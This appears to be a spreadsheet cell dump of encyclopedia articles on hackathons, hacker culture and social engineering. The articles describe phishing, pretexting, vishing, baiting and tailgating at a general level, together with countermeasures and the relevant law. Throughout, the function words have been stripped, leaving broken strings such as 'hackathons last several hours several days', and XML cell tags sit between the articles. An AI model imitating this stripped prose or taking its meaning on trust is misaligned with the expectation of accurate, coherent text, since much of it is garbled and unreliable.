undisclosed amount. structure hackathons typically start communication presentation page hosting organization mentions objectives, terms, details hackathon. developers register participate hackathon qualified organization screens background skills. when hackathon event begins, participating individuals teams start programming work. administrator hackathon typically able answer questions offer help issues come event. hackathons last several hours several days. hackathons last hours longer, especially competitive ones, eating often informal, participants often subsisting food like pizza energy drinks. sometimes sleeping informal well, participants sleeping on-site sleeping bags. hackathons, usually series demonstrations group presents results. capture great ideas work-in-progress often people post video demonstrations, blog results screenshots details, share links progress social media, suggest place open source code generally make possible people share, learn possibly build ideas generated initial work completed. there sometimes contest element well, panel judges select winning teams, prizes given. many hackathons, judges made organisers sponsors. barcamp-style hackathons, organised development community, iosdevcamp, judges usually made peers colleagues field. such prizes sometimes substantial amount money: social gaming hackathon techcrunch disrupt conference offered $250,000 funding winners, controversial 2013 hackathon salesforce.com payout million winners, billed largest-ever prize. types hackathons application type some hackathons focus particular platform mobile apps, desktop operating system, development video game development. mobile hackathons like over air, held phoenix park, ireland, large amount corporate sponsorship interest.music hack day, hackathon music-related software hardware applications, popular event, held times around world since 2009. also music tech fest, three-day interdisciplinary festival music ideas bringing together musicians hackers, researchers industry, features hackathon. similarly, science hack day, hackathon making things science, held times countries around world since 2010.hackathons held develop applications various mobile device operating systems, android, meego. hackathons also held develop video-based applications computer games. hackathons video games developed sometimes called game jams. hackfest" events held london francisco, focusing mainly social television second screen technologies. hackfests, challenge briefs typically submitted content producers brands, form broadcast industry metadata video content, sponsors supply apis, sdks pre-existing open source software code.hackathons also used life sciences advance informatics infrastructure supports research. open bioinformatics foundation hackathons member projects 2002 2003, since 2010 held 2-day "codefests" preceding annual conference. national evolutionary synthesis center co-organized sponsored hackathons evolutionary bioinformatics since 2006. biohackathon annual event started 2008 targeted advancing standards enable interoperable bioinformatics tools services. neuroscientists also used hackathons bring developers scientists together address issues range focusing specific information system (e.g., neurosynth hackathon allen brain atlas hackathon) providing reserved time broad scientific inquiry (e.g., brainhack), using specific challenges focus hacking activity (e.g., hackathon).there emergence 'datathons' data-focused hackathons recent years. these events challenge data scientists working others attending together creativity data analysis skills platforms build, test explore solutions dashboards analyse huge datasets limited amount time. these increasingly used deliver insights public private datasets various disciplines including business, health care news media social causes. using specific programming language, api, framework there hackathons devoted creating applications specific language framework, like javascript, node.js, html5 ruby rails.some hackathons focus applications make application programming interface, api, single company data source. open hack, event publicly yahoo! since 2006 (originally known "hack day", "open hack day"), focused usage yahoo! api, addition apis websites owned yahoo!, like flickr. company's open hack india event 2012 attendees. google similar events apis, travel guide company lonely planet.the website foursquare notably held large, global hackathon 2011, developers sites around world competed create applications using foursquare api. second foursquare hackathon, 2013, around developers. ietf organizes hackathons ietf meetings focused ietf internet draft ietf implementation better inter-operability improved internet standards. cause purpose there number hackathons devoted improving government, specifically cause open government. event, 2011, hosted united states congress. starting 2012, nasa annually hosting international space apps challenge. 2014, british government hackernest dementiahack, world's first hackathon dedicated improving lives people living dementia caregivers. series continues 2015, adding canadian government facebook major sponsors.the global game jam, largest video game development hackathon, often includes optional requirements called 'diversifiers' promote game accessibility causes. vanhacks annual hackathon part vancouver startup week. focus hackathon creating solutions local non-profit organizations vancouver area course hours. vanhacks created 2016 studios.various hackathons held improve city transit systems. hackathons aimed improvements city local services increasing, london councils (hackney) creating number successful local solutions two-day hackney-thon. there also number hackathons devoted improving education, including education hack smaller scale, looking specifically challenges field work based geography education, field studies council hosted fschackday. random hacks kindness another popular hackathon, devoted disaster management crisis response. theport instead hackathon devoted solving humanitarian, social public interest challenges. it's hosted cern partners non-governmental organizations icrc undp. march 2020, numerous world-wide initiatives entrepreneurs governmental representatives european countries resulted series anti-crisis hackathons hack crisis, first happen estonia, followed poland, latvia, ukraine. tribute memorial number hackathons around world planned memory computer programmer internet activist aaron swartz, died 2013. demographic group some hackathons intended programmers within certain demographic group, like teenagers, college students, women.hackathons colleges become increasingly popular, united states elsewhere. these usually annual semiannual events open college students universities. they often competitive, awards provided university programming-related sponsors. many supported organization major league hacking, founded 2013 assist running collegiate hackathons. pennapps university pennsylvania first student-run college hackathon; 2015 became largest college hackathon 12th iteration hosting 2000 people offering $60k prizes. university mauritius computer club cyberstorm.mu organized hackathon dubbed "code wars" focused implementing ietf lynx 2017.shamhacks missouri university science technology held annually outreach activity campus's curtis laws wilson library. shamhacks 2018 focused problem statements better quality life factors veterans, pairing veteran-owned company sponsors. internal innovation motivation some companies hold internal hackathons promote product innovation engineering staff. example, facebook's like button conceived part hackathon. connect local tech communities some hackathons (such startupbus, founded 2010 australia) combine competitive element road trip, connect local tech communities multiple cities along routes. this taking place across north america, europe, africa australasia. code sprints hackathons, work single application, operating system, programming language, content management system. such events often known "code sprints", especially popular open source software projects, events sometimes opportunity developers meet face-to-face.code sprints typically last week three weeks often take place near conferences team attend. unlike hackathons, events rarely include competitive element. annual hackathon work operating system openbsd, held since 1999, event; originated word "hackathon". criticism over years hackathons come severe criticism, multiple observers questioning adequacy hackathons deliver impactful technological solutions. major part reserve towards hackathons refers viability sustainability solutions develop, supported recent empirical research. study examining 11,889 u.s. based events revealed seven percent projects activity months hackathon ended. another global study found five percent projects developed hackathons continued five months. hackathons thus associated production short-lived software products often denominated vaporware.hackathons equally criticized failure contemplate complexity issues seek solve, developing technologies address underlining societal political causes problem. hackathon participants facto unpaid laborers commercial ventures criticized exploitative.high-profile hackathons also object controversies. team september 2013 techcrunch disrupt hackathon presented titstare app, allowed users post view pictures staring women's cleavage. techcrunch issued apology later day. november 2013 hackathon salesforce.com, billed largest-ever grand prize million, accused impropriety emerged winning entrants, two-person startup called upshot, developing technology demoed year former salesforce employee. major league hacking expelled pair hackers september 2015 hackathon hack north university waterloo making jokes interpreted bomb threats, leading many hackers criticize organization. result controversy, victor vucicevich resigned hack north organizing team. notable events mhacks hackmit junction (hackathon) hacktx also game installfest editathon charrette startup weekend campus party references external links "media-making strategies support community learning hackathons". center civic media. june 2014. "demystifying hackathon". article mckinsey, october, 2015</t>
  </si>
  <si>
    <t>Hacker (computer security)</t>
  </si>
  <si>
    <t>Hacker (programmer subculture)</t>
  </si>
  <si>
    <t>hacker culture subculture individuals enjoy often collective effort intellectual challenge creatively overcoming limitations software systems electronic hardware (mostly digital electronics), achieve novel clever outcomes. engaging activities (such programming media) spirit playfulness exploration termed hacking. however, defining characteristic hacker activities performed (e.g. programming), done whether exciting meaningful. activities playful cleverness said "hack value" therefore term "hacks" came about, early examples including pranks done students demonstrate technical aptitude cleverness. hacker culture originally emerged academia 1960s around massachusetts institute technology (mit)'s tech model railroad club (tmrc) artificial intelligence laboratory. hacking originally involved entering restricted areas clever without causing major damage. some famous hacks massachusetts institute technology placing campus police cruiser roof great dome converting great dome r2-d2.richard stallman explains hackers program: what common mainly love excellence programming. they wanted make programs used good could. they also wanted make neat things. they wanted able something exciting anyone believed possible show "look wonderful believe could done." hackers subculture tend emphatically differentiate pejoratively call "crackers"; generally referred media members general public using term "hacker", whose primary focus‍—‌be malign malevolent purposes‍—‌lies exploiting weaknesses computer security. definition jargon file, influential universally accepted compendium hacker slang, defines hacker person enjoys exploring details programmable systems stretching capabilities, opposed users, prefer learn minimum necessary." request comments (rfc) 1392, internet users' glossary, amplifies meaning person delights intimate understanding internal workings system, computers computer networks particular."as documented jargon file, hackers disappointed mass media general public's usage word hacker refer security breakers, calling "crackers" instead. this includes "good" crackers ("white hackers"), computer security-related skills knowledge learn systems networks work help discover security holes, well "evil" crackers ("black hackers"), skills author harmful software (such viruses trojans) illegally infiltrate secure systems intention harm system. programmer subculture hackers, contrast cracker community, generally sees computer security-related activities contrary ideals original true meaning hacker term, instead related playful cleverness. history word "hacker" derives seventeenth-century word "lusty laborer" harvested fields dogged rough swings hoe. although idea "hacking" existed long term "hacker"‍—‌with notable example lightning ellsworth, word first programmers used describe themselves. fact, many first programmers engineering physics backgrounds. "but 1945 onward (and especially creation first eniac computer) programmers realized expertise computer software technology evolved profession, passion" (46). there growing awareness style programming different dried methods employed first, 1960s term "hackers" began used describe proficient computer programmers. therefore, fundamental characteristic links identify hackers someone enjoys "…the intellectual challenge creatively overcoming circumventing limitations programming systems tries extend capabilities" (47). with definition mind, clear negative implications word "hacker" subculture "hackers" came from. some common nicknames among culture include "crackers", considered unskilled thieves mainly rely luck, "phreaks", refers skilled crackers "warez d00dz" (crackers acquire reproductions copyrighted software). hackers hired test security called "pentesters" "tiger teams". before communications computers computer users networked now, multiple independent parallel hacker subcultures, often unaware partially aware other's existence. certain important traits common: creating software sharing placing high value freedom inquiry hostility secrecy information-sharing ideal practical strategy upholding right fork emphasis rationality distaste authority playful cleverness, taking serious humorously humor seriously these sorts subcultures commonly found academic settings college campuses. artificial intelligence laboratory, university california, berkeley carnegie mellon university particularly well-known hotbeds early hacker culture. they evolved parallel, largely unconsciously, internet, legendary pdp-10 machine mit, called running its, provided early meeting point hacker community. this developments rise free software movement community drew together critically large population encouraged spread conscious, common, systematic ethos. symptomatic evolution increasing adoption common slang shared view history, similar occupational groups professionalized themselves, without formal credentialing process characteristic professional groups.over time, academic hacker subculture tended become conscious, cohesive, better organized. important consciousness-raising moments included composition first jargon file 1973, promulgation manifesto 1985, publication eric raymond's cathedral bazaar 1997. correlated gradual recognition shared culture heroes, including: bill joy, donald knuth, dennis ritchie, alan kay, thompson, richard stallman, linus torvalds, larry wall, guido rossum. concentration academic hacker subculture paralleled partly driven commoditization computer networking technology, has, turn, accelerated process. 1975, hackerdom scattered across several different families operating systems disparate networks; today largely unix tcp/ip phenomenon, concentrated around various operating systems based free software open-source software development. ethics principles many values tenets free open source software movement stem hacker ethics originated homebrew computer club. hacker ethics chronicled steven levy hackers: heroes computer revolution texts levy formulates summarizes general hacker attitudes: access computers-and anything might teach something world works-should unlimited total. information free. hackers judged hacking, bogus criteria degrees, age, race, position. create beauty computer. computers change life better.hacker ethics concerned primarily sharing, openness, collaboration, engaging hands-on imperative.linus torvalds, leaders open source movement (known primarily developing linux kernel), noted book hacker ethic principles evolved known protestant ethics incorporates spirits capitalism, introduced early 20th century weber. hack value notion used hackers express something worth interesting. this something hackers often feel intuitively problem solution. aspect hack value performing feats sake showing done, even others think difficult. using things unique outside intended purpose often perceived hack value. examples using matrix impact printer produce musical notes, using flatbed scanner take ultra-high-resolution photographs using optical mouse barcode reader. solution feat "hack value" done finesse, cleverness brilliance, makes creativity essential part meaning. example, picking difficult lock hack value; smashing not. another example, proving fermat's last theorem linking together modern mathematics hack value; solving combinatorial problem exhaustively trying possibilities not. hacking using process elimination find solution; process finding clever solution problem. uses while using hacker refer someone enjoys playful cleverness often applied computer programmers, sometimes used people apply attitude fields. example, richard stallman describes silent composition 4′33″ john cage 14th-century palindromic three-part piece commencement" guillaume machaut hacks. according jargon file, word hacker used similar sense among radio amateurs 1950s, predating software hacking community. programming boston globe 1984 defined "hackers" "computer nuts". programmer subculture, hacker person follows spirit playful cleverness loves programming. found originally academic movement unrelated computer security visibly associated free software, open source demoscene. also hacker ethic, based idea writing software sharing result voluntary basis good idea, information free, hacker make free breaking private computer systems. this hacker ethic publicized perhaps originated steven levy's hackers: heroes computer revolution (1984). contains codification principles. programmer subculture hackers disassociates mass media's pejorative word 'hacker' referring computer security, usually prefer term 'cracker' meaning. complaints supposed mainstream misuse started early 1983, media used "hacker" refer computer criminals involved 414s case.in programmer subculture hackers, computer hacker person enjoys designing software building programs sense aesthetics playful cleverness. term hack sense traced back "describe elaborate college pranks that...students would regularly devise" (levy, 1984 10). considered 'hack' honor among like-minded peers qualify hack, feat must imbued innovation, style technical virtuosity" (levy, 1984 tech model railroad club dictionary defined hack 1959 (not computer context) article project without constructive end; project undertaken self-advice; entropy booster; produce, attempt produce, hack(3)", "hacker" defined "one hacks, makes them". much tmrc's jargon later imported early computing culture, club started using pdp-1 applied local model railroad slang computing context. initially incomprehensible outsiders, slang also became popular mit's computing environments beyond club. other examples jargon imported club 'losing' ("when piece equipment working") 'munged' ("when piece equipment ruined").others always view hackers approval. living groups 1989 avoided advertising sophisticated project athena workstations prospective members wanted residents interested people, computers, fraternity member stating worried hacker subculture".according eric raymond, open source free software hacker subculture developed 1960s among 'academic hackers' working early minicomputers computer science environments united states. hackers influenced absorbed many ideas technological developments people associated them. most notable technical culture pioneers arpanet, starting 1969. pdp-10 machine mit, running operating system connected arpanet, provided early hacker meeting point. after 1980 subculture coalesced culture unix. since mid-1990s, largely coincident called free software open source movement. many programmers labeled "great hackers", specifics label applies matter opinion. certainly major contributors computer science edsger dijkstra donald knuth, well inventors popular software linus torvalds (linux), thompson dennis ritchie (unix programming language) likely included list; also list programmers. people primarily known contributions consciousness programmer subculture hackers include richard stallman, founder free software movement project, president free software foundation author famous emacs text editor well compiler collection (gcc), eric raymond, founders open source initiative writer famous text cathedral bazaar many essays, maintainer jargon file (which previously maintained steele, jr.). within computer programmer subculture hackers, term hacker also used programmer reaches goal employing series modifications extend existing code resources. sense, negative connotation using inelegant kludges accomplish programming tasks quick, ugly, inelegant, difficult extend, hard maintain inefficient. this derogatory form noun "hack" derives everyday english sense shape crude ruthless strokes" [merriam-webster] even used among users positive sense "hacker" produces "cool" "neat" hacks. words, "hack" original creation, axe, force-fit usable task intended original creator, "hacker" would someone habitually. (the original creator hacker person.) this usage common programming, engineering building. programming, hacking sense appears tolerated seen necessary compromise many situations. some argue negative meaning; others argue kludges can, ugliness imperfection, still "hack value". non-software engineering, culture less tolerant unmaintainable solutions, even intended temporary, describing someone "hacker" might imply lack professionalism. sense, term real positive connotations, except idea hacker capable modifications allow system work short term, sort marketable skills. however, always understanding skillful technical logician could produced successful modifications would considered "hack-job". definition similar other, non-computer based uses term "hack-job". instance, professional modification production sports racing machine would considered hack-job, cobbled together backyard mechanic's result could even though outcome race machines could assumed, quick inspection would instantly reveal difference level professionalism designers. adjective associated hacker "hackish" (see jargon file). universal sense, hacker also means someone makes things work beyond perceived limits clever general, without necessarily referring computers, especially mit. that people apply creative attitude software hackers fields computing. this includes even activities predate computer hacking, example reality hackers urban spelunkers (exploring undocumented unauthorized areas buildings). specific example clever pranks traditionally perpetrated students, perpetrator called hacker. example, students surreptitiously fake police atop dome mit's building hack sense, students involved therefore hackers. other types hacking reality hackers, wetware hackers ("hack brain"), media hackers ("hack reputation"). similar vein, "hack" refer math hack, clever solution mathematical problem. uses spread beyond mit. home computing enthusiasts another context, hacker computer hobbyist pushes limits software hardware. home computer hacking subculture relates hobbyist home computing late 1970s, beginning availability mits altair. influential organization homebrew computer club. however, roots back amateur radio enthusiasts. amateur radio slang referred creatively tinkering improve performance "hacking" already 1950s.a large overlaps hobbyist hackers programmer subculture hackers existed homebrew club's days, interests values communities somewhat diverged. today, hobbyists focus commercial computer video games, software cracking exceptional computer programming (demo scene). also interest members group modification computer hardware electronic devices, modding. electronics hobbyists working machines computers also fall category. this includes people simple modifications graphing calculators, video game consoles, electronic musical keyboards device (see cuecat notorious example) expose functionality device unintended users company created number techno musicians modified 1980s-era casio sk-1 sampling keyboards create unusual sounds circuit bending: connecting wires different leads integrated circuit chips. results experiments range opening previously inaccessible features part chip design producing strange, dis-harmonic digital tones became part techno music style. companies take different attitudes towards practices, ranging open acceptance (such texas instruments graphing calculators lego lego mindstorms robotics gear) outright hostility (such microsoft's attempts lock xbox hackers routines blu-ray disc players designed sabotage compromised players.) context, "hack" refers program (sometimes illegally) modifies another program, often video game, giving user access features otherwise inaccessible them. example use, palm users (until iteration operating system), "hack" refers extension operating system provides additional functionality. term also refers people cheat video games using special software. this also refer jailbreaking iphones. hacker artists hacker artists create hacking technology artistic medium. this extended definition term means hacker. such artists work graphics, computer hardware, sculpture, music audio, animation, video, software, simulations, mathematics, reactive sensory systems, text, poetry, literature, combination thereof. dartmouth college musician larry polansky states: technology inextricably related. many musicians, video artists, graphic artists, even poets work technology—whether designing using it—consider part 'hacker community.' computer artists, like non-art hackers, often find society's fringes, developing strange, innovative uses existing technology. there empathetic relationship those, example, design experimental music software hackers write communications freeware. another description offered jenny marketou: hacker artists operate culture hackers manipulate existing techno-semiotic structures towards different end, inside cultural systems make things never intended successful software hardware hacker artist mark lottor (mkl), created light projects entitled cubatron, round cubatron. this made using custom computer technology, specially designed circuit boards programming microprocessor chips manipulate lights. hopkins software hacker artist well known artistic cellular automata. this art, created cellular automata computer program, generates objects randomly bump turn create objects designs, similar lava lamp, except parts change color form interaction. hopkins says: cellular automata simple rules applied grid cells, pixel values image. rule applied every cell, determine next state, based previous state cell neighboring cells. there many interesting cellular automata rules, look different, amazing animated dynamic effects. 'life' widely known cellular automata rule, many lesser known rules much interesting. some hacker artists create writing computer code, others, developing hardware. some create existing software tools adobe photoshop gimp. creative process hacker artists abstract artists using non-technological media. example, mathematicians produced visually stunning graphic presentations fractals, hackers enhanced, often producing detailed intricate graphics animations simple mathematical formulas. hacker mentions "vector open space" gerfried stocker 1996. switch|journal 1998. weekly "tag who's it?" ingrid hein, july 1998. linux today archived 2011-07-09 wayback machine "playing open source game" shawn hargreaves, 1999. canterbury christ church university library resources subject design, 2001. supercollider workshop seminar joel ryan describes collaboration hacker artists silicon valley. march 2002 anthony barker's weblog linux, technology economy "why geeks love linux", sept 2003. live research gesture response field-based performance satinder gill, 2005. hackers, they "the hackers identity", october 2014. also cowboy coding: software development without strict software development methodologies demoscene history free software maker culture unix philosophy references further reading jargon file role acculturating hackers since origins 1975. these academic literary works helped shape academic hacker subculture: abelson, hal; sussman, gerald (1984). structure interpretation computer programs. london: press. isbn 9780070004849. aho; sethi; ullman (1986). compilers: principles, techniques, tools. reading, addison-wesley. isbn 9780201100884. bourne, stephen (1983). unix system. reading, addison-wesley. isbn 9780201137910. brooks, fred (1975). mythical man-month. reading, addison-wesley. isbn 9780201006506. graham, paul (2004-05-18). hackers painters. sebastopol, o'reilly media. isbn 9780596006624. hoftstadter, douglas (1979). gödel, escher, bach. york, basic books. isbn 9780465026852. james, geoffrey (1987). programming. santa monica, infobooks. isbn 9780931137075. kernighan, brian ritchie, dennis (january 1988). programming language. englewood cliffs, prentice hall. isbn 9780131103702. kidder, tracy (1981). soul machine. boston, little, brown company. isbn 9780316491709. knuth, donald (1968). computer programming. reading, addison-wesley. isbn 9780201038019. levy, steven (1984). hackers: heroes computer revolution. garden city, anchor press doubleday. isbn 9780385191951. raymond, eric (1999). cathedral bazaar. cambridge, o'reilly media. isbn 9781565927247. stoll, cliff (september 1989). cuckoo's egg. york, doubleday. isbn 9780385249461. olson, parmy. (05-14-2013). anonymous: inside hacker world lulzsec, anonymous, global cyber insurgency. isbn 0316213527. coleman, gabriella. (nov 2014). hacker, hoaxer, whistleblower, spy: many faces anonymous. verso books. isbn 1781685835. shantz, jeff; tomblin, jordon (2014-11-28). cyber disobedience: re://presenting online anarchy. john hunt publishing. isbn 9781782795551. external links brief history hackerdom hack, hackers, hacking (see appendix gabriella coleman: anthropology hackers atlantic, 2010. gabriella coleman: hacker, hoaxer, whistleblower, spy: many faces anonymous open library</t>
  </si>
  <si>
    <t>Social engineering (security)</t>
  </si>
  <si>
    <t>context information security, social engineering psychological manipulation people performing actions divulging confidential information. this differs social engineering within social sciences, concern divulging confidential information. type confidence trick purpose information gathering, fraud, system access, differs traditional "con" often many steps complex fraud scheme.it also defined "any influences person take action best interests."an example social engineering "forgot password" function websites require login. improperly-secured password-recovery system used grant malicious attacker full access user's account, original user lose access account. information security culture employee behaviour impact information security organizations. cultural concepts help different segments organization work effectively work effectiveness towards information security within organization. "exploring relationship organizational culture information security culture" provides following definition information security culture: "isc totality patterns behavior organization contribute protection information kinds."andersson reimers (2014) found employees often part organization information security "effort" often take actions ignore organizational information security best interests. research shows information security culture needs improved continuously. "information security culture analysis change," authors commented "it's never ending process, cycle evaluation change maintenance." they suggest manage information security culture, five steps taken: pre-evaluation, strategic planning, operative planning, implementation, post-evaluation. pre-evaluation: identify awareness information security within employees analyse current security policy. strategic planning: come better awareness-program, need clear targets. clustering people helpful achieve operative planning: good security culture based internal communication, management-buy-in, security awareness training program. implementation: four stages used implement information security culture. they commitment management, communication organizational members, courses organizational members, commitment employees. techniques terms social engineering techniques based specific attributes human decision-making known cognitive biases. these biases, sometimes called "bugs human hardware,” exploited various combinations create attack techniques, listed below. attacks used social engineering used steal employees' confidential information. common type social engineering happens phone. other examples social engineering attacks criminals posing exterminators, fire marshals technicians unnoticed steal company secrets. example social engineering individual walks building posts official-looking announcement company bulletin says number help desk changed. employees call help individual asks passwords thereby gaining ability access company's private information. another example social engineering would hacker contacts target social networking site starts conversation target. gradually hacker gains trust target uses trust access sensitive information like password bank account details.social engineering relies heavily principles influence established robert cialdini. cialdini's theory influence based principles: reciprocity, commitment consistency, social proof, authority, liking, scarcity. principles authority social engineering, attacker pose authority increase likelihood adherence victim. intimidation attacker (potentially disguised) informs implies negative consequences certain actions performed. consequences could include subtle intimidation phrases "i'll tell manager" much worse. consensus/social proof people things people doing. example, experiment, confederates would look sky; bystanders would look missing. point experiment aborted, many people looking stopped traffic. conformity, asch conformity experiments. scarcity perceived scarcity generate demand. common advertising phrase "while supplies last" capitalizes sense scarcity. urgency linked scarcity, attackers urgency time-based psychological principle social engineering. example, saying offers available "limited time only" encourages sales sense urgency. familiarity liking people easily persuaded people like. cialdini cites marketing tupperware might called viral marketing. people likely liked person selling them. some many biases favoring attractive people discussed. physical attractiveness stereotype. four social engineering vectors vishing vishing, otherwise known "voice phishing", criminal practice using social engineering telephone system gain access private personal financial information public purpose financial reward. also employed attackers reconnaissance purposes gather detailed intelligence target organization. phishing phishing technique fraudulently obtaining private information. typically, phisher sends e-mail appears come legitimate business—a bank, credit card company—requesting "verification" information warning dire consequence provided. e-mail usually contains link fraudulent page seems legitimate—with company logos content—and form requesting everything home address card's credit card number. example, 2003, phishing scam users received emails supposedly ebay claiming user's account suspended unless link provided clicked update credit card (information genuine ebay already had). mimicking legitimate organization's html code logos, relatively simple make fake website look authentic. scam tricked people thinking ebay requiring update account information clicking link provided. indiscriminately spamming extremely large groups people, "phisher" counted gaining sensitive financial information small percentage (yet large number) recipients already ebay accounts also fall prey scam. smishing using text messaging lure victims specific course action. like phishing clicking malicious link divulging information. examples text messages claim common carrier (like fedex) stating package transit, link provided. impersonation pretending pretexting another person goal gaining access physically system building. impersonation used "sim swap scam" fraud. other concepts pretexting pretexting (adj. pretextual) creating using invented scenario (the pretext) engage targeted victim manner increases chance victim divulge information perform actions would unlikely ordinary circumstances. elaborate lie, often involves prior research setup information impersonation (e.g., date birth, social security number, last bill amount) establish legitimacy mind target. background, pretexting interpreted first evolution social engineering, continued develop social engineering incorporated current-day technologies. current past examples pretexting demonstrate development. this technique used fool business disclosing customer information well private investigators obtain telephone records, utility records, banking records information directly company service representatives. information used establish even greater legitimacy tougher questioning manager, e.g., make account changes, specific balances, etc. pretexting also used impersonate co-workers, police, bank, authorities, clergy, insurance investigators—or individual could perceived authority right-to-know mind targeted victim. pretexter must simply prepare answers questions might asked victim. cases, needed voice sounds authoritative, earnest tone, ability think one's feet create pretextual scenario. vishing phone phishing "vishing") uses rogue interactive voice response (ivr) system recreate legitimate-sounding copy bank institution's system. victim prompted (typically phishing e-mail) call "bank" (ideally toll free) number provided order "verify" information. typical "vishing" system reject log-ins continually, ensuring victim enters pins passwords multiple times, often disclosing several different passwords. more advanced systems transfer victim attacker/defrauder, poses customer service agent security expert questioning victim. spear phishing although similar "phishing", spear phishing technique fraudulently obtains private information sending highly customized emails users. main difference phishing attacks phishing campaigns focus sending high volumes generalized emails expectation people respond. hand, spear-phishing emails require attacker perform additional research targets order "trick" users performing requested activities. success rate spear-phishing attacks considerably higher phishing attacks people opening roughly phishing emails compared roughly potential attempts. when users actually open emails phishing emails relatively modest success rate link attachment clicked compared spear-phishing attack's success rate.spear-phishing success heavily dependent amount quality osint (open-source intelligence) attacker obtain. social media account activity example source osint. water holing water holing targeted social engineering strategy capitalizes trust users websites regularly visit. victim feels safe things would different situation. wary person might, example, purposefully avoid clicking link unsolicited email, person would hesitate follow link website often visit. attacker prepares trap unwary prey favored watering hole. this strategy successfully used gain access (supposedly) secure systems.the attacker identifying group individuals target. preparation involves gathering information websites targets often visit secure system. information gathering confirms targets visit websites system allows visits. attacker tests websites vulnerabilities inject code infect visitor's system malware. injected code trap malware tailored specific target group specific systems use. time, members target group infected attacker gain access secure system. baiting baiting like real-world trojan horse uses physical media relies curiosity greed victim. attack, attackers leave malware-infected floppy disks, cd-roms, flash drives locations people find (bathrooms, elevators, sidewalks, parking lots, etc.), give legitimate curiosity-piquing labels, wait victims. example, attacker create disk featuring corporate logo, available target's website, label "executive salary summary 2012". attacker leaves disk floor elevator somewhere lobby target company. unknowing employee find insert disk computer satisfy curiosity, good samaritan find return company. case, inserting disk computer installs malware, giving attackers access victim's and, perhaps, target company's internal computer network. unless computer controls block infections, insertion compromises "auto-running" media. hostile devices also used. instance, "lucky winner" sent free digital audio player compromising computer plugged "road apple" (the colloquial term horse manure, suggesting device's undesirable nature) removable media malicious software left opportunistic conspicuous places. dvd, flash drive, among media. curious people take plug computer, infecting host attached networks. again, hackers give enticing labels, "employee salaries" "confidential".one study done 2016 researchers drop drives around campus university illinois. drives contained files linked webpages owned researchers. researchers able many drives files opened, many inserted computer without file opened. drives dropped, (98%) picked (45%) "called home". quid quid means something something: attacker calls random numbers company, claiming calling back technical support. eventually person someone legitimate problem, grateful someone calling back help them. attacker "help" solve problem and, process, user type commands give attacker access launch malware. 2003 information security survey, office workers gave researchers claimed password answer survey question exchange cheap pen. similar surveys later years obtained similar results using chocolates cheap lures, although made attempt validate passwords. tailgating attacker, seeking entry restricted area secured unattended, electronic access control, e.g. rfid card, simply walks behind person legitimate access. following common courtesy, legitimate person usually hold door open attacker attackers employee hold open them. attacker often purport phone call using mobile prevent questioning employee. legitimate person fail identification several reasons, accept assertion attacker forgotten lost appropriate identity token. attacker also fake action presenting identity token. other types common confidence tricksters fraudsters also could considered "social engineers" wider sense, deliberately deceive manipulate people, exploiting human weaknesses obtain personal benefit. they may, example, social engineering techniques part fraud. early 2000s, another type social engineering technique includes spoofing hacking people popular e-mail yahoo!, gmail, hotmail. additionally, spoofing attempts included emails major online service providers, like paypal. this "proposed standard" sender policy framework 7208 dated april 2014, combination dmarc, means combat spoofing. among many motivations deception are: phishing credit-card account numbers passwords. cracking private e-mails chat histories, manipulating using common editing techniques using extort money creating distrust among individuals. cracking websites companies organizations destroying reputation. computer virus hoaxes convincing users malicious code within browser self-xss attack allow access accountanother type read sensitive information unshielded unprotected displays input devices, called shoulder surfing. countermeasures organizations reduce security risks training employees: training employees security protocols relevant position. (e.g., situations tailgating, person's identity cannot verified, employees must trained politely refuse.) standard framework: establishing frameworks trust employee/personnel level (i.e., specify train personnel when/where/why/how sensitive information handled) scrutinizing information: identifying information sensitive evaluating exposure social engineering breakdowns security systems (building, computer system, etc.) security protocols: establishing security protocols, policies, procedures handling sensitive information. event test: performing unannounced, periodic tests security framework. inoculation: preventing social engineering fraudulent tricks traps instilling resistance persuasion attempts exposure similar related attempts.review: reviewing steps regularly: solutions information integrity perfect.waste management: using waste management service dumpsters locks them, keys limited waste management company cleaning staff. locating dumpster either view employees trying access carries risk seen caught, behind locked gate fence person must trespass attempt access dumpster. lifecycle social engineering information gathering: information gathering first foremost step lifecycle. requires much patience keenly watching habits victim. this step gathering data victim's interests, personal information. determines success rate overall attack. engaging victim: after gathering required amount information, attacker opens conversation victim smoothly without victim finding anything inappropriate. attacking: this step generally occurs long period engaging target information target retrieved using social engineering. phase, attacker gets results target. closing interaction: this last step includes slowly shutting communication attacker without arising suspicion victim. way, motive fulfilled well victim rarely realizes attack even happened. notable social engineers frank abagnale frank abagnale american security consultant known background former man, check forger, impostor ages became notorious impostors, claiming assumed fewer eight identities, including airline pilot, physician, u.s. bureau prisons agent, lawyer. abagnale escaped police custody twice (once taxiing airliner u.s. federal penitentiary) turning years old. popular steven spielberg movie catch based life. kevin mitnick kevin mitnick american computer security consultant, author hacker, best known high-profile 1995 arrest later five-year conviction various computer communications-related crimes. susan headley susan headley american hacker active late 1970s early 1980s widely respected expertise social engineering, pretexting, psychological subversion. known specialty breaking military computer systems, often involved going military personnel going clothes usernames passwords slept. became heavily involved phreaking kevin mitnick lewis payne angeles, later framed erasing system files leasing falling out, leading mitnick's first conviction. retired professional poker. james linton james linton british hacker social engineer 2017 used osint spear phishing techniques trick variety targets email including ceos major banks, members trump white house administration. went work email security socially engineered (business email compromise) threat actors collect specific threat intelligence. mike ridpath mike ridpath security consultant, published author, speaker. previous member w00w00. emphasizes techniques tactics social engineering cold calling. became notable talks would play recorded calls explain thought process passwords phone live demonstrations. child ridpath connected badir brothers widely known within phreaking hacking community articles popular underground ezines, phrack, b4b0 modifying 900s, blueboxing, satellite hacking rcmac. badir brothers brothers ramy, muzher, shadde badir—all blind birth—managed extensive phone computer fraud scheme israel 1990s using social engineering, voice impersonation, braille-display computers. christopher hadnagy christopher hadnagy american social engineer information technology security consultant. best known author books social engineering cyber security founder innocent lives foundation, organization helps tracking identifying child trafficking using various security techniques seeking assistance information security specialists, utilizing data open-source intelligence (osint) collaborating enforcement. common law, pretexting invasion privacy tort appropriation. pretexting telephone records december 2006, united states congress approved senate sponsored bill making pretexting telephone records federal felony fines $250,000 years prison individuals fines $500,000 companies). signed president george bush january 2007. federal legislation 1999 "glba" u.s. federal specifically addresses pretexting banking records illegal punishable federal statutes. when business entity private investigator, insurance investigator, adjuster conducts type deception, falls authority federal trade commission (ftc). this federal agency obligation authority ensure consumers subjected unfair deceptive business practices. federal trade commission act, section ftca states, part: "whenever commission shall reason believe person, partnership, corporation using unfair method competition unfair deceptive practice affecting commerce, shall appear commission proceeding respect thereof would interest public, shall issue serve upon person, partnership, corporation complaint stating charges respect." statute states someone obtains personal, non-public information financial institution consumer, action subject statute. relates consumer's relationship financial institution. example, 